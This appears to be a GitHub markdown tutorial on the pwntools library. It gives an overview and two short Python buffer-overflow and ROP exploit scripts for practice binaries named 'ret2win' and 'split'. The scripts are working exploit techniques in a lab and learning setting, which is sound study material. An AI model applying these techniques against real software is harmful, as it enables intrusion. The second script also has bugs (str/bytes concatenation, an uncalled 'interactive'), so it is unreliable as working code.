Skip to content

Latest commit

 

History

History
71 lines (47 loc) · 2.53 KB

pwntools.md

File metadata and controls

71 lines (47 loc) · 2.53 KB

Pwntools is a Python library that provides a set of utilities for developing exploits for binary programs. It simplifies the task of writing exploits by providing a set of powerful tools for working with low-level programming constructs, such as sockets, processes, and files.

Here are some basic things to know about pwntools:

  • Pwntools provides a set of powerful tools for working with binary programs, including remote and local exploitation.
  • It provides a simplified interface for interacting with low-level programming constructs, such as sockets and processes.
  • It includes support for common exploit techniques, such as heap and stack spraying, shellcode injection, and return-oriented programming (ROP).
  • It has a built-in ELF parser, which allows for easy inspection of binary files.
  • Pwntools can be used with both Python 2 and Python 3.
  • It provides a number of useful utilities, such as hexdump and cyclic, for working with binary data.
  • Pwntools can be installed using pip or downloaded from the GitHub repository.

Here are some example use cases for pwntools:

  • Writing a simple buffer overflow exploit for a binary program.
  • Developing a remote exploit to exploit a network service running on a target machine.
  • Building a payload to inject shellcode into a vulnerable program.
  • Using ROP to bypass address space layout randomization (ASLR) and execute arbitrary code.

{Example code 1}

from pwn import *

# Connect to the target binary
p = process('./ret2win')

# Find the offset to overwrite the return address
offset = cyclic_find('faaagaaa')

# Craft the payload to overwrite the return address with the address of the ret2win function
payload = b'A' * offset
payload += p64(0x00400811)

# Send the payload to the binary
p.sendline(payload)

# Receive the output from the binary
output = p.recvall().decode('utf-8')

# Print the output
print(output)

{Example code 2}

from pwn import *

# create a process object and load the executable binary
p = process('./split')



# determine the offset to the return address on the stack
offset = 40

# retrieve the addresses of the desired functions/strings using the ELF object
ret_address = 0x00000000004007c3


# construct the payload by padding the offset with arbitrary characters
# then appending the address of the return instruction and the address of the system call with the argument of the flag file
payload = 'A' * offset + p64(ret_address) + p64(0x00601060) + p64(0x0040074b)

# send the payload to the process and get the result and priviledge
p.sendline(payload)
p.interactive